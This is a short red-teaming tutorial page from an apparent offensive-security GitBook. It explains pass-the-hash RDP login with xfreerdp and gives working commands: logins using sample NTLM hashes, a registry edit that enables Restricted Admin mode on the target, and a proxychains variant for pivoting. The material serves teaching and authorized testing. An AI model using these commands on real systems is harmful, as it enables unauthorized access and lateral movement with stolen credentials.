RedTeamGarage (RTG)
  • RTG
    • About RTG
    • About the Author
    • Order Your Copy – Offensive Red Teaming Book
    • Launching Your Career in Ethical Hacking: A Comprehensive Step-by-Step Guide
  • RED TEAMING ZONE
    • Why Offensive Cyber Red Teaming
  • Red Teaming Methodology
  • Recon for Red Teaming- Theory
  • Recon for Red Teaming- Practical
  • OSINT for Red Teaming
  • Reverse Shell 101
    • Windows Reverse Shell
    • Reverse Shell References
  • Lateral Movement 101
  • Offensive PowerShell
  • Offensive C Sharp (C#)
  • Offensive WMI
  • RDP login with NTLM Hash
  • RDP as a Console
  • Bypassing Windows AppLocker
  • Attacking MSSQL
  • Backdoors
  • Pivoting & Tunneling
  • Cloud in Red Teaming
  • Social Engineering in Red Teaming
Powered by GitBook
On this page

RDP login with NTLM Hash

PreviousOffensive WMINextRDP as a Console

Last updated 11 months ago

RDP login using NTLM Hash is absolutely possible. Just keep in mind that the target RDP port must be reachable from our Parrot attacking machine. So if we have a valid NTLM Hash of any user (Mostly Admin), we can use that hash to login through RDP using xfreerdp:

xfreerdp /u:admin /pth:2892d26cdf84d7a70e2eb3b9f05c425e /v:192.168.69.6 /cert-ignore

Enable RDP pass the hash on the Target Machine for example purpose:

New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force

Then to pass the hash with RDP to Target_Machine:

proxychains xfreerdp /v:172.16.X.194 /u:administrator /pth:f99529e42ee77dc4704c568ba9320a34 +compression +clipboard /dynamic-resolution +toggle-fullscreen /cert-ignore

Remote Desktop taken through NTLM Hash